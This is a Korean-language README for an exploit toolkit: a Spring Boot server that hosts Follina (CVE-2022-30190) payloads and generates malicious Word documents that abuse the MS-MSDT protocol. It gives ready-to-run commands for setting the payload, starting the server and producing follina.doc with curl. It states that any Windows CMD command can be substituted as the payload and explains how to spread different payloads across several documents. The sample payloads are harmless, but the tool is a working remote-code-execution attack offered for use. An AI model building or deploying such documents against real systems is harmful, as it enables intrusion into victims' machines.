
Follina 페이로드를 호스팅/활성화하는 서버 및 MS-MSDT 프로토콜을 악용하는 악성 Word 문서 생성기. (CVE-2022-30190)
이 저장소는 Follina 페이로드를 호스트/활성화하는 서버이자, CVE-2022-30190을 악용하기 위한 공격 벡터로 사용될 악성 Word 문서 생성기 역할을 하는 간단한 Spring Boot 애플리케이션을 포함합니다.
이 취약점은 MSDT *(Microsoft Windows 지원 진단 도구)*를 통한 원격 코드 실행으로 구성됩니다.
원하는 고유 페이로드를 제공하려면 다음을 수행해야 합니다:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
현재 페이로드를 변경하려면 먼저 현재 활성 서버를 중단해야 하며, 새 페이로드를 정의한 후 단계를 반복해야 합니다.
참고: 페이로드는 Windows CMD를 통해 실행할 수 있는 모든 명령어로 대체할 수 있습니다.
원하는 클라이언트 측 페이로드를 제공하려면 다음을 수행해야 합니다:
mvn spring-boot:run
cmd 쿼리 매개변수를 지정하여 "Follina" Word 문서 생성 (예):curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
이 경우 페이로드는 문서 내에 포함되어 있으며, 서버에 접촉하여 활성화만 하면 됩니다. 이렇게 하면 여러 문서에 여러 다른 페이로드를 분산시킬 수 있으며, 페이로드 변경을 위해 서버를 재시작할 필요 없이 원하는 페이로드가 포함된 새 문서를 생성하기만 하면 됩니다.
Python 구현을 만들어내고 CVE 분석을 공유해 주신 John Hammond님께 감사드립니다.